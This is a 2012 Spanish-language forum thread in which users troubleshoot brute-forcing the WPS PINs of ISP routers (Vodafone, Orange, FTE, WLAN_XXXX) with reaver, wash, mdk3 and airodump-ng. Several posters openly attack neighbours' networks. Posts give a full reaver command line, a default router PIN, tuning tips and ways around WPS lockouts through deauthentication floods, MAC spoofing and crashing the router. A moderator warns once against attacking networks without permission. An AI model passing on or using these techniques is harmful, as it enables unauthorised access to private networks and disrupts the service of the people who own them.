Hola sabeis alguno si estas redes de vodafone mac 64:16:f0 son vulnerables a reaver esque me encontrado una con el wps activado supuestamente antes no lo tenian saludos

Hay que buscar antes de preguntar y mirrar en el lugar apropriado, en este caso el primer post de este topichttp://lampiweb.com/foro/index.php/topic,8188.0.html Son tres veces que colocas esta pregunta en varios topic.
Se llama SPAM y es particularmente mal visto en un foro
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: vcx77 en Agosto 20, 2012, 02:24:42 am
si,son vulnerables.un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Agosto 20, 2012, 14:09:32 pm
gooolden

He recibido queja de un moderador, has preguntado lo mismo en tres post diferentes.. te recuerdo que esto es un foro y no por preguntar 3 veces los mismo obtendrás respuesta mas rápido. Cuando realices una consulta procura colocarla en el tema adecuado y esperas la respuesta que de otro compañero.. no la repitas de un día para otro, no siempre quien pueda responder entra en el foro de forma habitual o no la sabe, siempre se debe esperar un tiempo prudencial si no se obtiene respuesta amén de seguir intentándolo por nuestra cuenta.

Por otra parte y ya de paso para el resto decir que si un post está siendo moderada responder no va ayudar a la moderación, el usuario no se molestará en comprender el porqué de esta y lo único que se consigue es entorpecer la labor de los moderadores.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Agosto 20, 2012, 17:35:14 pm
lo siento mucho por imcumplir las normas en el foro pero tengo mi duda con esa red de vodafone por que nadie la ha conseguido nadie con el reaver y yo voy por el 32% del ataque pero me envia un error Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Receive timeout occurred
Trying pin 84405678 ve me envia m6 algunas veces y no pasa al 90% y a un cierto intentos de pines se queda pillado y o tengo que reiniciar el ataque de nuevo haber que opinais sobre esa red de si me dara el pin o no con ese error tengo una alfa tipica y el router esta pared con pared saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: vcx77 en Agosto 20, 2012, 20:19:03 pm
haciendo algunas pruebas con un colega y su router,eso pasa aveces por que se pierde la conexion,otra es por que hay dos ordenadores conectados a esa red y uno esta conectado con el pin por wps,cada vez que estaba uno conectado por wps pasaba eso,asi que puedo suponer que es por eso.pero tampoco puedo asegurarlo.un saludo

Agosto 20, 2012, 20:23:25 pm
por cierto cada vez veo mas redes WLAN_XXXX con encriptacion wep.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Agosto 21, 2012, 10:48:19 am
vcxx7 pero yo estoy pared con pared y tu como sabes que con esa mac las vodafone son vulnerables al ataque hombre tu entenderas mas pero tu crees con esos  errores podre conseguir el pin correcto saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Agosto 21, 2012, 11:17:00 am
haciendo algunas pruebas con un colega y su router,eso pasa aveces por que se pierde la conexion,otra es por que hay dos ordenadores conectados a esa red y uno esta conectado con el pin por wps,cada vez que estaba uno conectado por wps pasaba eso,asi que puedo suponer que es por eso.pero tampoco puedo asegurarlo.un saludo

Agosto 20, 2012, 20:23:25 pm
por cierto cada vez veo mas redes WLAN_XXXX con encriptacion wep.

Pues será donde tu vives donde yo vivo cada día ay mas WPA WPA2  y son de fibra óptica

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Septiembre 07, 2012, 18:45:21 pm
Habeis conseguido alguien alguna wlan_xxxx con esta mac 8C:0C:A3 es que tengo dudas por al final dicen que se queda en un blucke repetitivo yo estoy intentando con una de estas voy por el 11% cuando eso digo lo que sea que alguien si no le importa responda si aconseguido la clave saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gorrion333 en Septiembre 08, 2012, 13:12:10 pm
buenos dias.la verdad que esas redes yo la ataque y se paso 2 dias encontro los 4 primeros paso a 90% y continuo hasta que llego al 99,99% hay se quedo probando un mismo pin.no dio los 4 ultimos si no que paso a ese bucle de 99,99% y siempre pasando el mismo pin.saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kurgy en Septiembre 09, 2012, 03:36:15 am
buenos dias.la verdad que esas redes yo la ataque y se paso 2 dias encontro los 4 primeros paso a 90% y continuo hasta que llego al 99,99% hay se quedo probando un mismo pin.no dio los 4 ultimos si no que paso a ese bucle de 99,99% y siempre pasando el mismo pin.saludos

Usas el reaver 1.4 final?
Es un bug de las versiones 1.4 beta y anteriores, hay una famosa extensión linux made in spain < Nota para el foro linux

Post recortado por no respectar nuesta "Nota para el foro linux"


Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Septiembre 09, 2012, 16:48:31 pm
Hola se sabe algo de esta vodafone mac 64:16:f0 con reaver si alguien la ha sacado o algo esque yo estoy intentando con una y me pasa esto voy por el 50% casi es infernal




Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Septiembre 09, 2012, 17:25:18 pm
"Clavadita" a la respuesta Agosto 20, 2012 y respondida por vcx77 inmediatamente después.. amén de duplicar en otro post que fue a la papelera; si vas a preguntar lo mismo todo el día habrá que tomar otras medidas. ¿no entiendes que si no te ofrecen otra respuesta es porque o bien no la hay o bien no la saben responder?

Tu verás.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Septiembre 10, 2012, 13:44:30 pm
Vamos haber gooolden no es todo color de rosa yo de cuarenta que lo he intentado solo he obtenido una métete en la cabeza que el reaver no hace milagros ni los que estamos en el foro tampoco y no preguntes siempre la misma cosa que al final te van ha dar REAVER
Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Septiembre 11, 2012, 09:46:35 am
hola las  vodafone es cambiante que a otro dia tenga el wps activado por que pillo una red que no tenia el wps activado es que se lo activan o se activa automaticamente cuando pasa x tiempo a ver si alguien me responde saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 11, 2012, 15:53:37 pm
Es imposible responder a tus preguntas porque no dan ni un elemento para poder hacerlo.
En este caso es impredecible saber por ejemplo cual es el modelo del routeur  así que saber si la configuración de origen ha sido cambiada y si es el caso  como ha sido configurado.
Tampoco tienes ni idea de lo que esta sucediendo en tu escenario:
Puede ser por intervención del usuario.

Lo mejor en tu caso seria escribir una carta a cada uno de tus vecinos (redactada con educación y en un tono agradable) para pedir información sobre sus routeurs y la configuración de su WPS.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mbalakh en Septiembre 14, 2012, 03:58:39 am
hola buenas mi pregunta es porque en algunos routers conceptronics "0BRS4" se da el caso de que me dan claves similares a esta
fc06da6b7ecbfe332744195cad176d68a48213d42ec18e33134f12f7ace660c4

me gustaría saber que es exactamente, ya que el pin el reaver si que da uno lógico, pero las wpa no acceden.
Algún tipo de encriptación que se pueda resolver con un handshake ??
alguien puede ayudarme ??

y algún consejo o comando especifico para las orange ?? para que no bloquen ?

muchas gracias
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Septiembre 14, 2012, 08:47:28 am
¿alguien sabría decirme porque todos los FTE-XXXX que he probado atacar con varios reaver con adaptadores con varios chipsets me dan siempre un falso M6 que luego no llega a nada?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Septiembre 14, 2012, 18:10:41 pm
pues no lo se,yo no he tenido problemas con ellas
¿podrias decirme que reaver, que chipset tiene tu tarjeta y que sistema operativo usas?Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Septiembre 15, 2012, 08:29:48 am
utilizo reaver 1.4, chipset ralink 3070 y aveces el realtek 8187 y el distro no puedo decirtelo por que no se debe en este foro,va por privado. entendiendo carasucia que aveces a algunas halla que hacerlas el ataque mas de una vez para alcanzar el exito,la paciencia tambien es importante.
Gracias por tu respuesta pero he utilizado todos los reaver,todos los chipset y todos los sistemas operativos que me comentas y no he podido.En fin,lo intentaré por enésima vez.Gracias.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 15, 2012, 12:54:51 pm
He movido unos cuantos posts desde el hilo "WPS reaver desde 0".
Aqui hablamos de lo que no es instalacion y configuracion de reaver.
hola buenas mi pregunta es porque en algunos routers conceptronics "0BRS4" se da el caso de que me dan claves similares a esta
fc06da6b7ecbfe332744195cad176d68a48213d42ec18e33134f12f7ace660c4

me gustaría saber que es exactamente, ya que el pin el reaver si que da uno lógico, pero las wpa no acceden.
Algún tipo de encriptación que se pueda resolver con un handshake ??
alguien puede ayudarme ??

y algún consejo o comando especifico para las orange ?? para que no bloquen ?

muchas gracias


El routeur te da la llave en 256 bits. Pasa con unos routeurs.
Funciona igualmente.
Las orange nos bloqueen porque llevan una protección, si bien me recuerdo se activa después de 10 PIN falsos y desactiva el WPS por un tiempo.
O esperas o reinicias tu routeur.

¿alguien sabría decirme porque todos los FTE-XXXX que he probado atacar con varios reaver con adaptadores con varios chipsets me dan siempre un falso M6 que luego no llega a nada?

Es demasiado para el routeur con varios adaptadores a la vez.
Vale, te entiendo,  ;D no hablas de atacar con varios adaptadores a la vez sino que has probado con varios adaptadores y versiones de reaver sin resultado.
la distribución no importa, que lo tengas instalado en ubuntu, backtrack, xubuntu, slax, fedora etc...
Si no se quiere probar un PIN especifico es mejor utilizar la ultima versión de reaver.
Intenta aumentar el tiempo entre intentos ( "-d 2" o "-d 3" )
verifica con airodump-ng que tienes el RXQ a tope, que no baje de 80/75.
 
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: alfon6 en Septiembre 15, 2012, 14:32:56 pm
pues no lo se,yo no he tenido problemas con ellas

Lo mismito me pasa a mi,,!!! Ya he desistido, para mi que la RT8187 no es muy buena para el reaver.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Septiembre 15, 2012, 14:48:39 pm
He movido unos cuantos posts desde el hilo "WPS reaver desde 0".
Aqui hablamos de lo que no es instalacion y configuracion de reaver.
El routeur te da la llave en 256 bits. Pasa con unos routeurs.
Funciona igualmente.
Las orange nos bloqueen porque llevan una protección, si bien me recuerdo se activa después de 10 PIN falsos y desactiva el WPS por un tiempo.
O esperas o reinicias tu routeur.

Es demasiado para el routeur con varios adaptadores a la vez.
Vale, te entiendo,  ;D no hablas de atacar con varios adaptadores a la vez sino que has probado con varios adaptadores y versiones de reaver sin resultado.
la distribución no importa, que lo tengas instalado en ubuntu, backtrack, xubuntu, slax, fedora etc...
Si no se quiere probar un PIN especifico es mejor utilizar la ultima versión de reaver.
Intenta aumentar el tiempo entre intentos ( "-d 2" o "-d 3" )
verifica con airodump-ng que tienes el RXQ a tope, que no baje de 80/75.
 

Lo intentaré aumentando el tiempo entre intentos porque todo lo demás ya lo he intentado.En cuanto al PIN específico,es que da igual el que le metas ya que a la primera te devuelve el M6 como si fueran los 4 correctos pero al final entra en bug y no avanza a excepción de con reaver 1.3 que va probando sin dar el M6 hasta que llega a 99,99% y hay empieza a probar el último PIN sin parar.Gracias por todo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Septiembre 15, 2012, 14:59:10 pm
pues estas muy equivocado alfon6 el 8187 es perfecto para el reaver,los problemas suelen ser de la red,distancia mala calidad de señal etc,aveces hay que atacar la misma red mas de una vez para llegar al exito.la paciencia es la madre de la ciencia, yo con una FTE-XXXX de un colega con bssid cambiado tube que atacarla 6 0 7 veces para conseguirla,hasta nos reiamos,pero al final salio. los milagros no existen
¿Pero te ocurre que te da un M6 falso al primer PIN probado con todas las FTE-XXXX sea cual sea su mac o es simplemente que te cuesta mucho tiempo que avance?Porque yo lo he intentado con varias casi obsesivamente y no hay manera porque falla desde el principio y todo lo que hace despues no sirve para nada.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: gooolden en Septiembre 15, 2012, 18:11:50 pm
Hola sabeis si estas FTE-XXXX con esta mac 00:26:61 es vulnerable a reaver el wps no lo tiene activado pero si alguien tiene informacion sobre esta red el router es un sagem saludos
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dominatrix en Septiembre 17, 2012, 08:28:23 am
Hola buenas no se donde poner este post si no disculpar bueno a lo que voy eh probado pines de diversos ruters que tienen por defecto y despues de que el programa se queda pillado o se blokea el ruter y no la saca ni a tiros siempre da mas error que otra cosa, lo puse para que fuese buscando pines desde 0.00% hasta 100% y no hay manera se queda pillado comprobando el mismo pin cuando ya esta en 98% para que ya la saque pues nada siempre pasa lo mismo se pilla en el mismo pin y no hay manera de que ningun ruter de los que eh probado te saque alguna puñ.. contraseña y encima te tarda tres dias para que luego no la saque asi que no se otra gente que suerte tendra con esto por que aqui eh probado con diversos ruters y pines que se supone que son los que vienen por defecto y tendria que salir,pero nada no hay forma para mi esto es una perdida de tiempo vamos que pruebes con un monton y no te la saque esto ya es el colmo asi que nada tampoco se puede pedir mucho es lo que hay y tener suerte claro saludetes por hay.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 17, 2012, 13:09:54 pm
Ya lo he movido  ;)
Entonces es una buena noticia: tu routeur y los de tus amigos son inmunes a reaver wps.
Pero no es el caso de todos los routeurs.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: MEGAHOM en Septiembre 17, 2012, 15:33:28 pm
para mi esto es una perdida de tiempo vamos que pruebes con un monton y no te la saque esto ya es el colmo asi que nada tampoco se puede pedir mucho es lo que hay y tener suerte claro saludetes por hay.

Hombre tanto como una perdida de tiempo no se que decirte mas bien es tener paciencia por mi parte en lo que va de mes yo he conseguido dos con el reaver la ultima me costo dos días con sus noches

Como digo mucha paciencia

Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Paranoyas en Septiembre 18, 2012, 12:20:48 pm
A ver amigazos, el asunto está, en que si meteis el pin en el comando, cuando empieza con el ataque... DEBE SALIR M2,M4 Y M6 . Si únicamente sale m2 y m4 es porque el pin no es correcto, y aunque llegueis al 100% no sacareis nada, por mucho que digan que esos pins son genéricos y demás...

Un saludo ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Septiembre 18, 2012, 13:44:22 pm
kcdtv comento esto aquí ya que he visto varios mensajes tuyos hablando del tema, estoy dando caña a un 00:19:15 con mdk3 a -a y no hay forma de resetearlo ni bloquearlo, venía de serie con WEP y lo han cambiado a WPA, pero nada (a ver si le meto un pin). ¿Has probado con estos routers a ver como te han ido? 2 horas y un millón de autentificados y se los come con patatas fritas, puede que los nuevos routers estén preparados para ataques DoS, eso sí si hay filtrado MAC el ataque DoS no funciona con ningún router. Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 18, 2012, 16:37:41 pm
Tus preguntas son mas sobre mdk3 que reaver wps ;).
Haré un thread cuando tenga tiempo, a lo mejor esta noche, para explicar un poco mdk3. Estará basado en este PDF de antares_145 y cr@sh, el documento es muy sencillo pero escrito en francés...
El ataque que empleas se llama authentification flood y no es igual que un DoS (Denial of service), lo que pasa es que ha quedado un poco obsoleto y no te funcionara lo bastante para crashear un routeur moderno.
No entiendo porque lo haces frente a un tecom> el problema con estos routeurs es estar asociado y conseguir mandar los PIN y procesar las respuestas.
Hacer crashear el routeur es para saltarse el bloqueo  del WPS.
En el caso de los tecom, por defecto el WPS no esta activado así que no se puede lograr al ataque (sale en wash y no esta bloqueado pero al ser inactivo no se consigue nada).
Crashear el routeur no cambiaría la situación.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Septiembre 18, 2012, 19:09:40 pm
El router estaba de fábrica con WEP y tenía la clave, al tiempo lo cambiaron por WPA, WPS lo tiene activado pero no tiene ningún PIN, por lo tanto con wash si que me da que tiene WPS activado pero no funciona con Reaver. He mirado otros ataques con mdk3 pero ninguno es eficaz, es verdad que esta herramienta tiene sus años. Quería saber si era posible conseguir bloquear el router, resetearlo lo veo casi imposible en un router moderno. Gracias por tu ayuda socio. Un saludo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 18, 2012, 20:23:44 pm
Os recuerdo que NO ayudamos a atacar redes ajenas sin permiso de los dueños de esta red.
Amigo soyercolonel tus mensajes resultan algo ambiguos respecto al tema, ten lo en cuenta en la redacción de tus mensajes por favor.
Respecto a mdk3 en cuento haya hecho el thread te responderé ahí  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: soyelcoronel en Septiembre 19, 2012, 21:37:20 pm
Tienes razón socio, pido disculpas. Hay que tener cuidado con lo que se escribe en los foros ya que es público. Cuando prepares el tema de mdk3 ya comentaremos como va, aunque personalmente lo veo superado. Un saludo
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ignash en Septiembre 23, 2012, 16:44:18 pm
Muy buenas gente, soy nuevo en el foro!


Llevo unos días leyendo acerca seguridad wps, reaver, tema pins y tal...

En casa de mis padres han instalado un router de tipo WLAN_XXXX con MAC 00:19:15 y por defecto venía el wps desactivado. Por lo que he leído, estos routers vienen con PIN por defecto 12345670.

Entonces, mi duda es la siguiente. Conocido este PIN y estando el WPS desactivado, que opciones hay? que se consigue con el PIN?

Me ha parecido entender que encuentras la clave WPA a través del PIN pero no lo acabo de comprender..


Gracias!
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 23, 2012, 17:18:29 pm
Hola y bienvenido al foro  :)
 
Esta explicado en el primer post de nuestro hilo Patrones de PINs para WPA dónde encontrarás mas información sobre otros modelos de routeurs
No puedes atacar a este routeur a no ser que activas el wps o encuentres una forma para que el routeur active el wps.
No hay otra opción (que sepa)  :-\
PD: hecha-le un ojo a nuestras reglas, respecto al titulo que habías puesto a tu topic  ;)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Septiembre 23, 2012, 18:10:43 pm
Cita de: ignash
Conocido este PIN y estando el WPS desactivado, que opciones hay?

Cita de: kcdtv
No hay otra opción (que sepa)


Opciones:

newWLANJAZZTELXXXX 'GUI  &  WLAN-001915 Generador de dico reducido para WLAN_XXXX

ambos de la casa   8)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ignash en Septiembre 23, 2012, 19:22:03 pm
muchas gracias por las respuestas!

veamos entonces, si no he leído mal lo que debería hacer es conseguir el archivo del handshake y guardarlo en la carpeta de vuestro programa.

Rellenar MAC, ESSID y luego la opcion 001915?


Y sobre la otra parte, se conoce alguna manera para hacer que el router active el wps?


Muchas gracias de nuevo!

Un saludo y encantado :)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: maripuri en Septiembre 23, 2012, 19:35:26 pm
Eso es.

Para activar WPS entra en la configuración del router a través del navegador, buscas la opción en las diferentes pestañas de configuración y listo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: ignash en Septiembre 23, 2012, 19:41:15 pm
Vale perfecto, gracias maripuri!

Y a lo del wps me refería sin acceso físico, mediante algun ataque de autentificación o por el estilo.

Graciaas
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 23, 2012, 19:47:03 pm
que yo sepa no.
encima los ataques de authentificación son generalmente a meta "destructiva", para enloquecer el routeur o el cliente, lo que suelen generar es más bien caos que ayudarte a entrar en comunicación correcta con el routeur. No es un aspecto que tienen muy en cuenta en su elaboración, pero siempre se pueden cruzar tools y usar de forma original, hay que tener imaginación y probar cosas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Kaitomx en Septiembre 25, 2012, 20:57:10 pm
una cosa aber si me lo podeis explicar con el wash e encontrado redes ke pone ke el wps esta desactivado y sin embargo el reaver realiza el ataque de forma exitosa(an sido en redes ono a0:21 y wlan de laas 00:19:15) alguien me puede decir x ke es???
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dicker88 en Septiembre 28, 2012, 14:08:48 pm
He estado probando a auditar con xiaopan 0.4.1 y comprobando las inseguridades de telefonica,ono,jazztel...y si tiene el wps activado sale la clave.Pero en orange y vodafone es diferente...no entiendo porque se queda parado en un determinado porcentaje % y no continua.
Segun tengo entendido por fuentes, para las orange si no se le hace algo al router para k alguien lo reinicie  y luego se audite,no se puede sacar la clave.
Espero podais decirme algun parametro para ver y probar mas cosas.Un saludo y gracias x todo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Septiembre 28, 2012, 16:05:36 pm
@ dicker88, repasa  el hilo (por ejemplo la respuesta 223 y siguientes), hablamos de ello varias veces.
Activa wash (o walsh) y verás que se cierra el WPS de tu routeur cuando tienes el mensaje "AP rate limit" y que no consigues ni asociar ni mandar PINes.
@ Katomix
Wash/walsh tiene algunos fallos. Va bastante bien pero no va perfecto. Para bien escanear con wash/walsh es mejor hacer un escaneo en un solo canal y dejarlo algo como dos minutos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: mirkaust en Octubre 04, 2012, 04:17:25 am
Llevo tiempo intentando conseguir clave de 2 redes 00:19:15 con reaver, pero siempre tengo la misma respuesta:


 Sending EAPOL START request
 WARNING: Receive timeout occurred
 Sending EAPOL START request
 WARNING: Receive timeout occurred
 Sending EAPOL START request

He probado con 2 adaptadores USB (Ralink 3070 y Realtek 8187) y con reaver 1.3 y 1.4, leí en un foro utilizar el siquiente comando si tenías este problema:

Código: [Seleccionar]
reaver -i mon0 -b BSSID -a -c Channel -e "ESSID" -d 5 -w -N -vv
Pero siempre el mismo resultado, tanto con wash (1.4) como con walsh (1.3) obtengo ambas redes con wps no bloqueado, incluso el driver Ralink me da que son wps. ¿Alguna idea socios para poder hacer el ataque completo? Tengo muy buen señal de ambas. Un saludo.

NOTA: Cuando ves en el driver Ralink las redes disponibles unas te aparecen con llave y otras con dos flechas curvadas una mirando hacia arriba y otra hacia abajo, fijaos bien, esa red tiene WPS activado.

alguien puede ayudar me pasa lo mismo que al compañero
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Miguel21 en Octubre 07, 2012, 19:00:50 pm
buenas amigos he probado con la conexión mia es una ONOxxxx con mac C0:3F:0E.... pero me dice warning 10 connections failed in a row porque me sale eso es normal que salga?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dicker88 en Octubre 08, 2012, 11:07:48 am
Eso suele salir o cuando la señal es baja creo ....porque cuando esta wps activado te desasocia... en un par de minutos.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carrasco30 en Octubre 08, 2012, 15:28:07 pm
por que la red que estas tiandole la tienes lojos,poreso n es tu ya y leete las normas de foro
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: panchito en Octubre 10, 2012, 10:48:51 am
Tengo dos dudas: 1ª. mi red aun teniendo buena señal 85-90% el tiempo de respuesta busqueda de pin es muy lenta (15 sg) no así con otra red que es algo mas rapida (2-3 sg) ambas WLAN_XXXX. A que puede ser debido? 2ª. Al realizar salvado de sesión realizo un ctrl+ c para detenerlo y continuar en otro momento, se crea el archivo .xzm .Cuando lo recupero despues de poner toda la secuencia de comandos (reaver-i mon0 -b XX:XX:XX:XX:XX -s + archivo) me empieza de nuevo la captura de pin pero me comienza de nuevo al 0% cuando lo detuve por ejemplo al 0,20%. algo estoy haciendo mal?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 10, 2012, 13:30:26 pm
¿Es el mismo modelo de routeur? Porque hay muchos modelos de routeurs diferentes puestos en funcionamiento por telefonica, que sea un wlan_xxxx no indica nada...   ;)
Asegúrate de tener un RXQ a 100 en tu ventana airodump-ng y que ninguno cliente este conectado mientras haces el ataque para estar en condiciones optimas.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: panchito en Octubre 12, 2012, 13:29:30 pm
Cliente conectado, pues esto falla porque este router solo está activo cuando conecta mi vecino..podría ser esta la causa de la lentitud en enviar/recibir pin. (14 sg no baja)
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dicker88 en Octubre 14, 2012, 11:54:17 am
Mi propuesta es la siguiente:
Desautentificas al router
Desautentificas al cliente
Te autentificas con MAC falsa creada por ti
A la misma vez de este proceso atacas por un posible handshake
Mientras usas Reaver para atacar al wps

Resultados:
Parece que asocia de esta manera, pero tarda la vida en los pin evolucionan y tal....(Pero evoluciona el proceso no se queda estancado) si hubiera usado otro programita chino que conozco con inflator no te deja NI ASOCIAR ni empezar a atacar al router por WPS..... 8)

¿OPINIONES? Alguien con una idea mejor??????????''
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Octubre 14, 2012, 12:17:28 pm
Son dos métodos diferentes que ,en principio, no tienen relación entre ellos,¿no?
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dicker88 en Octubre 14, 2012, 12:23:35 pm
Lo del handshake es ponerlo por poner...por tener en el .capture si sale el handshake....pero que vamos...que con lo de la desautentificacion es el proceso en si y luego el reaver.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: carasucia en Octubre 14, 2012, 21:36:15 pm
Lo del handshake es ponerlo por poner...por tener en el .capture si sale el handshake....pero que vamos...que con lo de la desautentificacion es el proceso en si y luego el reaver.
Sigo sin verle relación a no ser  que desautentifiques al cliente porque reaver sólo  funcione  con un solo  cliente conectado que creo que no es el caso.No obstante, wpscrackgui hace todo eso sin mucho lio.(lo de falsear la mac  y todo lo demás que comentas).
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 15, 2012, 14:43:41 pm
Todo lo que te pasa es por historias de distancia y calidad de señal.  ::)
Y cómo hay mucho trafico... peor aún.
Al attacar con DoS los clientes consigues asociarte porque no hay trafico durante un rato y tirar un PIN malamente.
De paso: ¿Que es esto de "Desautentificas al router :o
Has abierto un hilo a pesar de no tener ni la mas remota idea del modelo del routeur y que no estas en condiciones de recepción suficientes para poder pretender adelantar nada ni sacar ninguna conclusión.
¿Tienes Internet me parece?
Entonces parra de joder la vida de tus vecinos a golpe de ataque de desauthentification para poder tirar un par de pin de vez en cuando., y si quieres hacer pruebas consistentes hazlas en tu routeur dónde sabes que pasa  y tienes un RXQ suficiente (ni mas ni menos que 100, a tope)
Muevo este aporte en el hilo general sobre ataque WPS, si quieres abrir un tema sobre un routeur y reaver lo más básico es saber cual es el modelo del routeur y estar en condiciones para probarlo.
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: Dicker88 en Octubre 15, 2012, 16:14:07 pm
En el caso de las redes Orange-xxxx te deja asociar sin problema hasta un porcentaje de mas o menos el 0,30% en el reaver.
Que pasa?Que luego te desasocia y ni de coña sigue el proceso..... Segun un colega ingeniero informatico que consiguio  sacar la clave en alguna red que otra orange ...ahi hay que desauntetificar el router si o si para en ese breve espacio de tiempo autentificarte tu, con mac falsa....porque si no,no te tira  mas que el 0,00% y te desasocia 'volao'
Ademas la mierda de las orange es el puto boton fisico que tienen y que estan preparadas para reaver.Tengo que indagar mas a mi colega que sabe bastante del tema sobre las orange-xxxx .En cuanto me informe al pelo , os comento todo con pelos y señales....quizas podria ser un avance importante...
Título: Re:Vulnerabilidad en Wi-Fi Protected Setup (WPS)
Publicado por: kcdtv en Octubre 15, 2012, 19:19:46 pm
En wireless no se desautentica un routeur, lo que puedes hacer es desautenticar clientes   ;)
Hablamos de los orange-xxxx antes en el hilo, si te interessa el tema mirra por ejemplo a partir de la respuesta #227.
Me parece que te estas haciendo un lio en la cabeza entre varios topics tratando de varios routeurs...
No se que te habrá comentado tu amigo ingeniero informatico pero lo que explicas aquí es incoherente.
Hay 2 cosas, dos tipos de defensa.
 
1 > El "AP rate limit" o sistema de bloqueo del WPS. Por ejemplo en las box construidas por la SAGEM (livebox y orange-xxxx). También en los routeurs con essid ONO_XXXXXXX (routeur de thomson si no me confundo.. ???)
Después de 10 intentos se bloquea el WPS para un rato tiempo, muy largo en las box SAGEM y menos con los routeurs de essid ONO_XXXXXXX (menos de una hora). 
Y a parte de reinciar el routeur...
